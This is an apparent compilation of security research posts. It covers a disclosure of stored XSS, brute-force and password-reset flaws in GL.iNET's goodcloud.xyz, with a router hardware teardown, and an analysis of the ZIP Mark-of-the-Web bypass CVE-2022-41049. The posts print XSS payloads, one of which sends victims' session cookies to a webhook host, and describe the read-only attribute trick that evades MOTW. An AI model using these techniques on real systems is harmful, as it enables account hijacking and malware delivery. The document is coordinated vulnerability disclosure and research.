<a href="https://www.google.com/chart?chs=200x200&amp;chld=M|0&amp;cht=qr&amp;chl=otpauth://totp/%3CUSER%20HERE%3E?secret=%3CSECRET%20HERE%3E&amp;issuer=goodcloud.xyz">https://www.google.com/chart?chs=200x200&amp;chld=M|0&amp;cht=qr&amp;chl=otpauth://totp/&lt;USER HERE>?secret=&lt;SECRET HERE>&amp;issuer=goodcloud.xyz</a>

This is purely speculative. 

The GL.iNET team was extremely quick to remediate this issue. Less than 12h after reporting it a fix was applied as seen below.

Disclosure Timeline 

May 11, 2022: Initial discovery
May 11, 2022: Vendor contacted & vulnerability reported
May 11, 2022: Vendor confirms vulnerability
May 12, 2022: Vendor patched the vulnerability


Stored Cross-Site Scripting

The MT300N-V2 portable router has the ability to join itself to the remote cloud management configuration gateway (goodcloud.xyz) which allows for remote management of linked IoT devices.  There exist multiple user input fields that do not properly sanitize user-supplied input. As a result, the application is vulnerable to stored cross-site scripting attacks. If this attack is leveraged against an enterprise account through the 

Sub Account
 invitation it can lead to the account takeover of the joined accounts. 

Vulnerability Details

CVE ID: CVE-2022-42054
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-79
CVSS Base Score: 8.7
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:H

We’ll find the vulnerable inputs field in the «Group Lists» panel, in which a user can modify and create as many groups as they want.

The vulnerable fields are 

Company
 and 
Description
. The payloads I used as a proof of concept are the following:

<img src=x onerror=confirm(document.cookie)>

or

<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x64;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#46;&#x63;&#x6f;&#x6f;&#x6b;&#x69;&#x65;&#x29;>

Once the group is saved anytime the user either logs in or switches regions (Asia Pacific, America, Europe), logs in, or switched organication the XSS will trigger as seen below.

This occurs because there is a 

listQuery
 key that checks for 
{"pageNum":"","pageSize":"","name":"","company":"","description":""}
 and our XSS is stored and referenced within 
company
 name & 
description
 which is how the XSS triggers.

Can this be used maliciously? Unfortunately not with regular user accounts. With enterprise accounts yes, as we’ll see later. Here’s why. Realistically the only way to leverage this would be to share a device with a malicious named 

company
 and 
description
 fields with another user. 

Even with the patch for the PII and User Enumeration vulnerability above, it is still possible to enumerate 

userID
‘s which is exactly what we need to send a shared device invitation to users. Below is an example request.

An attacker with a regular user account would create a group with a 

company
 or 
description
 name like 
&lt;script type=“text/javascript”&gt;document.location=“http://x.x.x.x:xxxx/?c=“+document.cookie;&lt;/script&gt;
. Then invite a victim to that group. When the victim would login the attacker would able to steal their sessions. Unfortunately with a regular user account, this isn’t possible. 

If we share the device from 

boschko
(attacker) to 
boschko1
(victim). Here’s how the chain would go. After 
boschko
 creates the malicious group and sends an invitation to 
boschko1
 he’s done. The victim 
boschko1
 would login and receive the invite from 
boschko
 as seen below.

However, when we sign-out and back into 

boschko1
 no XSS triggered, why? It’s because there is a difference between being a member of a shared group (a group shared by another user with you) and being the owner (you made the group shared and created) as can be seen below.

As seen above, a user of a shared group won’t have the malicious fields of the group translated to their «frontend».

HOWEVER! If you have a business/enterprise account or are logged in as a business/enterprise user you can leverage this stored XSS to hijack user sessions! All thanks to features only available to business users :).

Business features provide the ability to add «Sub Accounts». You can think of this as having the ability to enroll staff/employees into your management console/organization. If a user accepts our 

subAccount
 invitation they become a staff/employee inside of our «organization». In doing so, we’ll have the ability to steal their fresh session cookies after they login because they’d become owners of the malicious group by association.

Let’s take this one step at a time. The Subscription Account panel looks like this.

I’m sure you can make out its general functionality. After inviting a user via their email address they will receive the following email.

I’ll try and break this down as clearly as I can. 

  • User A (attacker) is 
    boschko
     in red highlights. 
  • User B (victim) is 
    boschko1
     in green highlights.
  1. Step 1: Create a malicious company as 
    boschko
     with XSS company name and description
  2. Step 2: Invite 
    boschko1
     to the malicious company as 
    boschko
  3. Step 3: Get boschko1 cookies and use them to log in as him

Below is the user info of 

boschko
 who owns the company/organization 
test
. He also owns the «Group List» 
happy company
 the group which is part of the 
test
 organization.

boschko1
 has been sent an invitation email from 
boschko
boschko1
 has accepted and has been enrolled into 
boschko
‘s 
test
 organization. 
boschko1
has been given the 
Deployment Operator
 level access over the organization.

Logged into 

boschko1
 the user would see the following two «workspaces», his personal 
boschko1 (mine)
 and the one he has been invited to 
test
.

When 

boschko1
 is signed into his own team/organization 
boschko1 (mine)
, if devices are shared with him nothing bad happens.

When 

boschko1
 signes into the 
test
 organization that 
boschko
 owns by 
Switch Teams
 the malicious 
company
 and 
description
 are properly referenced/called upon when 
listQuery
 action.

The stored XSS in the malicious 

test
 company, 
company
 and 
description
fields (members of the 
happy company
 Group List) gets trigger when 
boschko1
 is signed into 
boschko
 organization 
test
.

From our malicious 

boschko
 user, we will create a group with the following malicious 
company
 and 
description
 names.

<img src=x onerror=this.src='https://webhook.site/6cb27cce-4dfd-4785-8ee8-70e932b1b8ca?c='+document.cookie>

We can leverage the following website since we’re too lazy to spin up a digital ocean droplet. With this webhook in hand, we’re ready to steal the cookies of 

boschko1
.

Above, 

boschko
 has stored the malicious javascript within his 
company
 and 
description
 fields simply log  
boschko1
 into the 
test
 organization owned by 
boschko
 and receive the cookies via the webhook.

As seen below, we get a bunch of requests made containing the session cookies of 

boschko1
.

Using the stolen 

boschko1
 session cookies the account can be hijacked.

The GL.iNET team remediated the issue by July 15 with some pretty solid/standard filtering.

I attempted a handful of bypasses with U+FF1C and U+FF1E, some more funky keyword filtering,  substrings, array methods, etc, and had no success bypassing the patch. 

Disclosure Timeline 

May 12, 2022: Initial discovery
May 12, 2022: Vendor contacted & vulnerability reported
May 13, 2022: Vendor confirms vulnerability
May 19, 2022: Contact vendor about enterprise user impact
July 7, 2022: Follow up with the vendor
July 15, 2022: Vendor patched the vulnerability


Weak Password Requirements & No Rate Limiting

The MT300N-V2 portable router has the ability to join itself to the remote cloud management configuration gateway with its accounts created through goodcloud.xyz which allows for remote management of linked IoT devices. The login for goodcloud.xyz was observed to have no rate limiting. Additionally, user passwords only require a minimum of 6 characters and no special characters/password policy. This makes it extremely simple for an attacker to brute force user accounts leading to account takeover. 

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-521
CVSS Base Score: 9.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

As seen below when users create their cloud gateway 

goodcloud.xyz
 accounts they’re only required to have a password ≥6 with no capitalization, or special characters being required or enforced.

Additionally, due to having no rate limiting on login attempts by using Burp Suite intruder it’s trivial to spray users or brute force user accounts.

Below is an example of successfully obtaining the password for a sprayed user.

In total, I was able to recover the passwords of 

33
 application users. I never tested these credentials to log into the UI for obvious ethical reasons. All the data was reported back to the GL.iNET team.  

Disclosure Timeline 

May 18, 2022: Initial discovery
May 24, 2022: Vendor contacted & vulnerability reported
May 24, 2022: Vendor confirms vulnerability
June 7, 2022: Vendor implements rate-limiting, patching the vulnerability


Password Policy Bypass

The MT300N-V2 portable router has the ability to join itself to the remote cloud management configuration gateway (goodcloud.xyz) which allows for remote management of linked IoT devices.  For these cloud gateway accounts, while password complexity requirements were implemented in the original signup page, these were not added to the password reset page. The current lack of rate limiting this severely impacts the security posture of the affected users.

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-521
CVSS Base Score: 6.7
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

The reset password policy isn’t consistent with the registration and change password policy. As a result, it’s possible to bypass the 6-character password requirements to a single character. In general, the application should validate that the password contains alphanumeric characters and special characters with a minimum length of around eight. Additionally, I feel like it’s best practice not to allow users to set the previously used password as the new password.

As seen below, through the UI the password change has checks on the client side to ensure the password policy is respected.

In Burp Suite we can intercept the request and manually set it to a single character.

The request above is submitting successfully, and the new password for the 

boschko
 user has been set to 
1
. The request below is the login request, as you can see it was successful.

Disclosure Timeline 

May 26, 2022: Initial discovery
May 26, 2022: Vendor contacted & vulnerability reported
May 26, 2022: Vendor confirms vulnerability
July 7, 2022: Follow up with the vendor
July 15, 2022: Vulnerability has been patched


Additional Interesting Finds 

I made a few interesting discoveries that I don’t consider vulnerabilities. 

Before we jump into this one we have to quickly talk about ACL configuration. Basically, for 

rpc
 having appropriate access control over the invocations the application can make is very important. These methods should be strictly controlled. For more information on this refer to the Ubus-Wiki.

Once we’ve installed OpenWrt as seen above, the application will generate the list of 

rpc
 invocation methods for OpenWrt which is defined within the ACL configuration file 
/usr/share/rpcd/acl.d/luci-base.json
. Here is a snippet of the file in question.

...
	"luci-access": {
		"description": "Grant access to basic LuCI procedures",
		"read": {
			"cgi-io": [ "backup", "download", "exec" ],
			"file": {
				"/": [ "list" ],
				"/*": [ "list" ],
				"/dev/mtdblock*": [ "read" ],
				"/etc/crontabs/root": [ "read" ],
				"/etc/dropbear/authorized_keys": ["read"],
				"/etc/filesystems": [ "read" ],
				"/etc/rc.local": [ "read" ],
				"/etc/sysupgrade.conf": [ "read" ],
				"/etc/passwd": [ "read" ],
				"/etc/group": [ "read" ],
				"/proc/filesystems": [ "read" ],
...
		"write": {
			"cgi-io": [ "upload" ],
			"file": {
				"/etc/crontabs/root": [ "write" ],
				"/etc/init.d/firewall restart": ["exec"],
				"/etc/luci-uploads/*": [ "write" ],
				"/etc/rc.local": [ "write" ],
				"/etc/sysupgrade.conf": [ "write" ],
				"/sbin/block": [ "exec" ],
				"/sbin/firstboot": [ "exec" ],
				"/sbin/ifdown": [ "exec" ],
...

Not being a subject matter expert, I would however say that the above methods are well-defined. Methods in the file namespace aren’t simply «allow all» — 

( "file": [ "*" ] )
 if it were the case, then this would be an actual vulnerability.

rpcd
 has also a defined user in 
/etc/config/rpcd
 that we can use for the management interface. This user is used to execute code through a large number of  
rpcd
 exposed methods.

With this information in hand, we should be able to login with these credentials. As a result, we will obtain a large number of methods that can be called, and get the 

ubus_rpc_session
.

As seen in the following image this 

ubus_rpc_session
 value is used to call other methods defined in ACL config files.

Now we might look at the image above and think we have RCE of sorts. However, for some weird reason 

/etc/passwd
 is actually defined with valid read primitives within the 
luci-base.json
 ACL config file.

As seen below attempting to read any other files will result in a failed operation.

I simply found this interesting hence why I am writing about it.

Hardware Teardown 

Let’s actually start the intended project! The GL-MT300N router looks like this:

It’s nothing fancy, the device has a USB port, 2 ethernet ports (LAN & WAN), a reset button, and a mode switch. Let’s break it open and see what hardware we have on hand.

Immediately there are some interesting components. There looks to be a system on a chip (SoC), SPI flash, and some SD RAM. There is also a serial port and what looks like could potentially be JTAG, and almost definitely UART.

In terms of chipsets, there is a MediaTek MT7628NN chip which is described as being a «router on a chip» the datasheet shows it is basically the CPU and it supports the requirements for the entry-level AP/router.

Looking at the diagram of the chip there is communication for UART, SPI, and I2C which are required to transfer data. This also confirms that this chip has a serial console that can be used for debugging. If this is still enabled this could allow us to access the box while it’s running and potentially obtain a shell on the system.

The second chip is the Macronix MX25L12835F SPI (serial flash chip) this is what attacked for most of the reversing process to obtain the application’s firmware. This is because the serial flash usually contains the configuration settings, file systems, and is generally the storage for devices lacking peripherals would be stored. And looking around on the board there is no other «storage device». 

The third, and last chip is the Etron Technology EM68C16CWQG-25H which is the ram used by the device when it is running. 

Connecting to UART

Let’s quickly go over what’s UART. UART is used to send and receive data from devices over a serial connection. This is done for purposes such as updating firmware manually, debugging, or interfacing with the underlying system (kind of like opening a new terminal in Ubuntu). UART works by communicating through two wires, a transmitter wire (TX) and a receiver wire (RX) to talk to the micro-controller or system on a chip (basically the brains of the device) directly.

The receiver and transmitter marked RX and TX respectively, need to connect to a second respective UART device’s TX and RX in order to establish a communication. I’m lucky enough to have received my Flipper Zero so I’ll be using it for this!

If you would like more in-depth information on UART see my blog on hacking a fertility sperm tester. We’ll connect our Flipper Zero to the router UART connection as seen below.

The result will be a little something like this.

Since I’m a Mac user connecting to my Flipper Zero via USB will «mount» or make the device accessible at 

/dev/cu.usbmodemflip*
 so if I want to connect to it all I need to do is run the command below.

Once I’ve ran the screen command, and the router is powered on, ill start seeing serial output confirming that I’ve properly connected to UART.

As you can see, I’ve obtained a root shell. Unprotected root access via the UART is technically a vulnerability CWE-306. Connecting to the UART port drops you directly to a root shell, and exposes an unauthenticated Das U-Boot BIOS shell. This isn’t something you see too often, UART is commonly tied down. However, «exploitation» requires physical access, the device needs to be opened, and wires connecting to pads RX, TX, and GND on the main logic board. GL.iNET knows about this, and to my knowledge doesn’t plan on patching it. This is understandable as there’s no «real» impact. 

I’ll go on a «quick» rant about why unprotected UART CVEs are silly. The attack requires physical access to the device. So, an attacker has to be on-site, most likely inside a locked room where networking equipment is located, and is probably monitored by CCTV… The attacker must also attach an additional USB-to-UART component to the device’s PCB in order to gain console access. Since physically dismantling the device is required to fulfill the attack, I genuinely don’t consider this oversight from the manufacturer a serious vulnerability. Obviously, it’s not great, but realistically these types of things are at the vendor’s discretion. Moreover, even when protections are in place to disable the UART console and/or have the wide debug pads removed from the PCB there are many tricks one can use to navigate around those mechanisms.

Although personally, I believe it’s simply best practice for a hardware manufacturer to disable hardware debugging interfaces in the final product of any commercial device. Not doing so isn’t worthy of a CVE.

Getting back on track. Hypothetically if we were in a situation where we couldn’t get access to a shell from UART we’d likely be able to get one from U-Boot. There are actually a lot of different ways to get an application shell from here. Two of those techniques were covered in my blog Thanks Fo’ Nut’in — Hacking YO’s Male Fertility Sperm Test so I won’t be covering them here.

Leveraging the SPI Flash

Even though the serial console is enabled, if it weren’t, and we had no success getting a shell from U-Boot, our next avenue of attack might be to extract the firmware from the SPI flash chip. 

The goal is simple, read the firmware from the chip. There are a few options like using clips universal bus interface device, unsoldering the chip from the board and connecting it to a specialized EPROM read/write device or attaching it to a Protoboard. I like the first option and using SOIC8 clips over hook clips.

At a minimum, we’ll need a hardware tool that can interact with at least an SPI interface. I’m a big fan of the Attify Badge as it’s very efficient and supports many interfaces like SPI, UART, JTAG, I2C, GPIO, and others. But you could other devices like a professional EPROM programmer, a Bus Pirate, beagleboneRaspberry Pi, etc,.

Below is the pinout found on the datasheet for our Macronix MX25L12835F flash.

All you need to do is make the proper connections from the chip to the Attify badge. I’ve made mine according to the diagram below.

OK. I spent a solid two nights trying to dump the firmware without success. I’ve tried the Bus Pirate, Shikra, Attify, and a beaglebone black but nothing seems to work. Flashrom appears to be unable to read the data or even identify the chip, which is really weird. I’ve confirmed the pinouts are correct from the datasheet, and as seen below, flashrom supports this chip.

Attempting to dump the firmware results in the following.

So what’s going on? I’m not an EE so I had to do a lot of reading & talking to extremely patient people. Ultimately, I suspect this is happening because there is already a contention for the SPI bus (the MediaTek MT7628NN chip), and due to the nature of what we’re attempting to do, the router is receiving two masters connections and ours is not taking precedence. Currently, the MCU on the board is the master of the SPI chip, that’s the one where all the communication is going to and from. I wasn’t able to find a way to intercept, short, or stop that communication to make our Attify badge the master. In theory, a trick to get around this would be by holding down a reset button while reading the flash and just hoping to get lucky (I did this for ~2h and had no luck). Since our Attify badge would already be powered on, it could «IN THEORY» take precedence. This could, again «in theory» stop the chip from mastering to the MCU. But I haven’t been able to do so properly. I’ve spent ~8 hours on this, tying out multiple different hardware (PI, beaglebone, Attify, BusPirate) without success. I also suspect that being on a MacBook Pro with funky USB adapters could be making my situation worse.

Okay, we’re left with no other option than to go «off-chip». As previously mentioned, there are multiple ways to dump the contents of flash memory. Let’s try desoldering the component from the board, and use a chip reprogrammer to read off the contents. 

My setup is extremely cheap setup is very sub-optimal. I don’t own a fixed «hot air station» or PDC mount. I’m just using a loose heat gun.

Our goal is to apply enough heat so that the solder joints melt. We need to extracted the chip with tweezers without damaging components. Easier said then done with  my shitty station. differential heating on the board can be an issue. When a jet of hot air is applied to a PCB at room temperature, most of the heat is diffused to the colder spots, making the heating of the region of interest poor. To work around this you might think that increasing the heat will solve all of our issues. However, simply increasing the temperature is dangerous and not advisable. 

When a component is put under increased thermal stress the temperature gradient increases along the board. The temperature difference on the board will produce thermal expansion in different areas, producing mechanical stress that may damage the board, break, and shift components. Not good. My setup is prone to this type of error because I don’t have a mounting jig for the heat gun that can control distance. I don’t have any high-temperature tape I can apply to the surrounding components so that they don’t get affected by my shaky hand controlling the heat source.

Regardless, for most small components, a preheating temperature of 250º C should be enough.

After a few minutes, I was able to get the chip off. However, there is a tiny shielded inductor or resistor that was affected by the heat which shifted when I removed the SPI with the tweezers. I wasn’t able to get this component back on the board. Fuck. I’m not an EE so I don’t fully understand the impact and consequences this has.  

Let’s mount the SPI onto a SOP8 socket which we’ll then connect to our reprogrammer. Below is the orientation of the memory in the adapter.

This is, once again, quite a shitty reprogrammer. I actually had to disable driver signing to get the USB connection recognized after manually installing the shady driver. We’ll go ahead and configure our chip options knowing our SPI is Macronix MX25L12835F.

However, this also failed/couldn’t do any reads. I spend another ~5 hours debugging this. I thought it was the SOP socket clip so I soldered it onto a board and relayed the links to the reprogrammer but the results were the same.

After a while, I went ahead and re-soldered it to the main router PCB, and the device was fully bricked. To be quite honest, I’m not sure what I did wrong/at which step I made the mistake. 

They say that failure is another stepping stone to greatness, but given that the entire reason for this purchase was to try out some new hardware hacking methodologies…. this was very bittersweet. 

I remembered the squashfs information displayed in the UART log information. So, if we really wanted to reverse the firmware it’s still impossible. You can grab the unsigned firmware from the vendor’s site vendors here. Below are the steps you’d follow if you had successfully extracted the firmware to get to the filesystem.

So let’s check if they have any hardcoded credentials.

Luckily, they don’t.

The last thing I observed was that in the UBI reader there is an extra data block at the end of the image and somewhere in between that in theory could allow us to read code.

This purchase was supposed to be hardware hacking focused & I failed my personal objectives. To compensate I’ll share some closing thoughts with you. 

In case you were wondering «how can the vendor prevent basic IoT hardware vulnerabilities? And is it worth it?». The answer is yes, and yes. This blog is long enough so I’ll keep it short. 

Think of it this way. Having an extra layer of protection or some baseline obfuscation in the event that developers make mistakes is a good idea and something that should be planned for. The way I see it, if the JTAG, UART, or ICSP connector weren’t immediately apparent, this would’ve slowed me down and perhaps eventually demotivate me to push on. 

The beautiful part is that hardware obfuscation is easy to introduce at the earliest stages of product development. Unlike software controls, which are implemented at later stages of the project and left out due to lack of time. There exist many different hardware controls which are all relatively easy to implement. 

Since the hardware hacking portion of this blog wasn’t a great success I might as well share some thoughts & ideas on remediation & how to make IoT hardware more secure. 

1. Removing the PCB silkscreen. Marks, logos, symbols, etc, have to go. There’s no real reason to draw up the entire board, especially if it’s in production.

2. Hide the traces! It’s too simple to follow the solder mask (the light green parts on this PCB) What’s the point of making them so obvious?

3. Hardware-level tamper protection. It’s possible to set hardware and even software fuses to prevent readout (bear in mind that both can be bypassed in many cases).

4. Remove test pins and probe pads and other debugging connections. Realistically speaking if the product malfunctions and a firmware update won’t fix it, the manufacturer likely won’t send someone onsite to debug /fix it. 99% of the time they’re simply going to send you a new one. So why have debug interfaces enabled/on production devices?

5. If you’re using vias as test points (because they make using a multimeter or a scope probe much easier, and are typically used by embedded passive components) it would be wise to use buried or blind vias. The cost of adding additional PCB layers is cheap if you don’t already have enough to do this.

6. Remove all chipset markings! It’s seriously so much harder & time-consuming to identify a chip with no markings.

7. Why not use tamper-proof cases, sensors (photodiode detectors), or one-way screws. Again some of these are not difficult to drill bypass. However, you’re testing the motivation of the attacker. Only really motivated reverse engineers would bother opening devices in the dark.

If you’re interested, here are some solid publications regarding hardware obfuscation I’d recommend the following papers:

1. https://arxiv.org/pdf/1910.00981.pdf
2. https://swarup.ece.ufl.edu/papers/J/J48.pdf

Summary:

I hope you liked the blog post. Follow me on twitter I sometimes post interesting stuff there too. This was a lot of fun! Personally, I’d strongly recommend going on Amazon, Alibaba, or Aliexpress and buying a bunch of odd or common IoT devices and tearing them down. You never know what you will find 🙂

Thank you for reading!

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Original text by breakdev

Windows ZIP extraction bug (CVE-2022-41049) lets attackers craft ZIP files, which evade warnings on attempts to execute packaged files, even if ZIP file was downloaded from the Internet.

In October 2022, I’ve come across a tweet from 5th July, from @wdormann, who reported a discovery of a new method for bypassing MOTW, using a flaw in how Windows handles file extraction from ZIP files.

Will Dormann
@wdormann
The ISO in question here takes advantage of several default behaviors: 1) MotW doesn’t get applied to ISO contents 2) Hidden files aren’t displayed 3) .LNK file extensions are always hidden, regardless of the Explorer preference to hide known file extensions.

So if it were a ZIP instead of ISO, would MotW be fine? Not really. Even though Windows tries to apply MotW to extracted ZIP contents, it’s really quite bad at it. Without trying too hard, here I’ve got a ZIP file where the contents retain NO protection from Mark of the Web.

https://twitter.com/wdormann/status/1544416883419619333

This sounded to me like a nice challenge to freshen up my rusty RE skills. The bug was also a 0-day, at the time. It has already been reported to Microsoft, without a fix deployed for more than 90 days.

What I always find the most interesting about vulnerability research write-ups is the process on how one found the bug, what tools were used and what approach was taken. I wanted this post to be like this.

Now that the vulnerability has been fixed, I can freely publish the details.

Background

What I found out, based on public information about the bug and demo videos, was that Windows, somehow, does not append MOTW to files extracted from ZIP files.

Mark-of-the-web is really another file attached as an Alternate Data Stream (ADS), named 

Zone.Identifier
, and it is only available on NTFS filesystems. The ADS file always contains the same content:

[ZoneTransfer]
ZoneId=3

For example, when you download a ZIP file 

file.zip
, from the Internet, the browser will automatically add 
file.zip:Zone.Identifier
 ADS to it, with the above contents, to indicate that the file has been downloaded from the Internet and that Windows needs to warn the user of any risks involving this file’s execution.

This is what happens when you try to execute an executable like a JScript file, through double-clicking, stored in a ZIP file, with MOTW attached.

Clearly the user would think twice before opening it when such popup shows up. This is not the case, though, for specially crafted ZIP files bypassing that feature.

Let’s find the cause of the bug.

Identifying the culprit

What I knew already from my observation is that the bug was triggered when 

explorer.exe
 process handles the extraction of ZIP files. I figured the process must be using some internal Windows library for handling ZIP files unpacking and I was not mistaken.

ProcessHacker revealed 

zipfldr.dll
 module loaded within Explorer process and it looked like a good starting point. I booted up IDA with conveniently provided symbols from Microsoft, to look around.

ExtractFromZipToFile
 function immediately caught my attention. I created a sample ZIP file with a packaged JScript file, for testing, which had a single instruction:

WScript.Echo("YOU GOT HACKED!!1");

I then added a MOTW ADS file with Notepad and filled it with MOTW contents, mentioned above:

notepad file.zip:Zone.Identifier

I loaded up 

x64dbg
 debugger, attached it to 
explorer.exe
 and set up a breakpoint on 
ExtractFromZipToFile
. When I double-clicked the JS file, the breakpoint triggered and I could confirm I’m on the right path.

CheckUnZippedFile

One of the function calls I noticed nearby, revealed an interesting pattern in IDA. Right after the file is extracted and specific conditions are meet, 

CheckUnZippedFile
 function is called, followed by a call to 
_OpenExplorerTempFile
, which opens the extracted file.

Having a hunch that 

CheckUnZippedFile
 is the function responsible for adding MOTW to extracted file, I nopped its call and found that I stopped getting the MOTW warning popup, when I tried executing a JScript file from within the ZIP.

It was clear to me that if I managed to manipulate the execution flow in such a way that the branch, executing this function is skipped, I will be able to achieve the desired effect of bypassing the creation of MOTW on extracted files. I looked into the function to investigate further.

I noticed that 

CheckUnZippedFile
 tries to combine the TEMP folder path with the zipped file filename, extracted from the ZIP file, and when this function fails, the function quits, skipping the creation of MOTW file.

Considering that I controlled the filename of the extracted ZIP file, I could possibly manipulate its content to trigger 

PathCombineW
 to fail and as a result achieve my goal.

PathCombineW
 turned out to be a wrapper around 
PathCchCombineExW
 function with output buffer size limit set to fixed value of 
260
 bytes. I thought that if I managed to create a really long filename or use some special characters, which would be ignored by the function handling the file extraction, but would trigger the length check in 
CheckUnZippedFile
 to fail, it could work.

I opened 010 Editor, which I highly recommend for any kind of hex editing work, and opened my sample ZIP file with a built-in ZIP template.

I spent few hours testing with different filename lengths, with different special characters, just to see if the extraction function would behave in erratic way. Unfortunately I found out that there was another path length check, called prior to the one I’ve been investigating. It triggered much earlier and prevented me from exploiting this one specific check. I had to start over and consider this path a dead end.

I looked if there are any controllable branching conditions, that would result in not triggering the call to 

CheckUnZippedFile
 at all, but none of them seemed to be dependent on any of the internal ZIP file parameters. I considered looking deeper into 
CheckUnZippedFile
 function and found out that when 
PathCombineW
 call succeeds, it creates a 
CAttachmentServices
 COM objects, which has its three methods called:

CAttachmentServices::SetReferrer(unsigned short const * __ptr64)
CAttachmentServices::SetSource(unsigned short const * __ptr64)
CAttachmentServices::SaveWithUI(struct HWND__ * __ptr64)

 realized I am about to go deep down a rabbit hole and I may spend there much longer than a hobby project like that should require. I had to get a public exploit sample to speed things up.

Huge thanks you @bohops & @bufalloveflow for all the help in getting the sample!

Detonating the live sample

I managed to copy over all relevant ZIP file parameters from the obtained exploit sample into my test sample and I confirmed that MOTW was gone, when I extracted the sample JScript file.

I decided to dig deeper into 

SaveWithUI
 COM method to find the exact place where creation of 
Zone.Identifier
 ADS fails. Navigating through 
shdocvw.dll
, I ended up in 
urlmon.dll
 with a failing call to 
<a href="https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-writeprivateprofilestringw">WritePrivateProfileStringW</a>
.

This is the Windows API function for handling the creation of INI configuration files. Considering that 

Zone.Identifier
 ADS file is an INI file containing section 
ZoneTransfer
, it was definitely relevant. I dug deeper.

The search led me to the final call of 

<a href="https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntcreatefile">NtCreateFile</a>
, trying to create the 
Zone.Identifier
 ADS file, which failed with 
ACCESS_DENIED
 error, when using the exploit sample and succeeded when using the original, untampered test sample.

It looked like the majority of parameters were constant, as you can see on the screenshot above. The only place where I’d expect anything dynamic was in the structure of 

ObjectAttributes
 parameter. After closer inspection and half an hour of closely comparing the contents of the parameter structures from two calls, I concluded that both failing and succeeding calls use exactly the same parameters.

This led me to realize that something had to be happening prior to the creation of the ADS file, which I did not account for. There was no better way to figure that out than to use Process Monitor, which honestly I should’ve used long before I even opened IDA 😛.

Backtracking

I set up my filters to only list file operations related to files extracted to TEMP directory, starting with 

Temp
 prefix.

The test sample clearly succeeded in creating the 

Zone.Identifier
 ADS file:

While the exploit sample failed:

Through comparison of these two listings, I could not clearly see any drastic differences. I exported the results as text files and compared them in a text editor. That’s when I could finally spot it.

Prior to creating 

Zone.Identifier
 ADS file, the call to 
SetBasicInformationFile
 was made with 
FileAttributes
 set to 
RN
.

I looked up what was that 

R
 attribute, which apparently is not set for the file when extracting from the original test sample and then…

Facepalm

The 

R
 file attribute stands for 
read-only
. The file stored in a ZIP file has the read-only attribute set, which is set also on the file extracted from the ZIP. Obviously when Windows tries to attach the 
Zone.Identifier
 ADS, to it, it fails, because the file has a read-only attribute and any write operation on it will fail with 
ACCESS_DENIED
 error.

It doesn’t even seem to be a bug, since everything is working as expected 😛. The file attributes in a ZIP file are set in 

ExternalAttributes
 parameter of the 
ZIPDIRENTRY
 structure and its value corresponds to the ones, which carried over from MS-DOS times, as stated in ZIP file format documentation I found online.

4.4.15 external file attributes: (4 bytes)

       The mapping of the external attributes is
       host-system dependent (see 'version made by').  For
       MS-DOS, the low order byte is the MS-DOS directory
       attribute byte.  If input came from standard input, this
       field is set to zero.

   4.4.2 version made by (2 bytes)

        4.4.2.1 The upper byte indicates the compatibility of the file
        attribute information.  If the external file attributes 
        are compatible with MS-DOS and can be read by PKZIP for 
        DOS version 2.04g then this value will be zero.  If these 
        attributes are not compatible, then this value will 
        identify the host system on which the attributes are 
        compatible.  Software can use this information to determine
        the line record format for text files etc.  

        4.4.2.2 The current mappings are:

         0 - MS-DOS and OS/2 (FAT / VFAT / FAT32 file systems)
         1 - Amiga                     2 - OpenVMS
         3 - UNIX                      4 - VM/CMS
         5 - Atari ST                  6 - OS/2 H.P.F.S.
         7 - Macintosh                 8 - Z-System
         9 - CP/M                     10 - Windows NTFS
        11 - MVS (OS/390 - Z/OS)      12 - VSE
        13 - Acorn Risc               14 - VFAT
        15 - alternate MVS            16 - BeOS
        17 - Tandem                   18 - OS/400
        19 - OS X (Darwin)            20 thru 255 - unused

        4.4.2.3 The lower byte indicates the ZIP specification version 
        (the version of this document) supported by the software 
        used to encode the file.  The value/10 indicates the major 
        version number, and the value mod 10 is the minor version 
        number.  

Changing the value of external attributes to anything with the lowest bit set e.g. 

0x21
 or 
0x01
, would effectively make the file read-only with Windows being unable to create MOTW for it, after extraction.

Conclusion

I honestly expected the bug to be much more complicated and I definitely shot myself in the foot, getting too excited to start up IDA, instead of running Process Monitor first. I started with IDA first as I didn’t have an exploit sample in the beginning and I was hoping to find the bug, through code analysis. Bottom line, I managed to learn something new about Windows internals and how extraction of ZIP files is handled.

As a bonus, Mitja Kolsek from 0patch asked me to confirm if their patch worked and I was happy to confirm that it did!

https://twitter.com/mrgretzky/status/1587234508998418434

The patch was clean and reliable as seen in the screenshot from a debugger:

I’ve been also able to have a nice chat with Will Dormann, who initially discovered this bug, and his story on how he found it is hilarious:

I merely wanted to demonstrate how an exploit in a ZIP was safer (by way of prompting the user) than that *same* exploit in an ISO.  So how did I make the ZIP?  I:
1) Dragged the files out of the mounted ISO
2) Zipped them. That's it.  The ZIP contents behaved the same as the ISO.

Every mounted ISO image is listing all files in read-only mode. Drag & dropping files from read-only partition, to a different one, preserves the read-only attribute set for created files. This is how Will managed to unknowingly trigger the bug.

Will also made me realize that 7zip extractor, even though having announced they began to add MOTW to every file extracted from MOTW marked archive, does not add MOTW by default and this feature has to be enabled manually.

I mentioned it as it may explain why MOTW is not always considered a valid security boundary. Vulnerabilities related to it may be given low priority and be even ignored by Microsoft for 90 days.

When 7zip announced support for MOTW in June, I honestly took for granted that it would be enabled by default, but apparently the developer doesn’t know exactly what he is doing.

I haven’t yet analyzed how the patch made by Microsoft works, but do let me know if you did and I will gladly update this post with additional information.

Hope you enjoyed the write-up!

Android: Exploring vulnerabilities in WebResourceResponse

Android: Exploring vulnerabilities in WebResourceResponse

Original text by oversecured

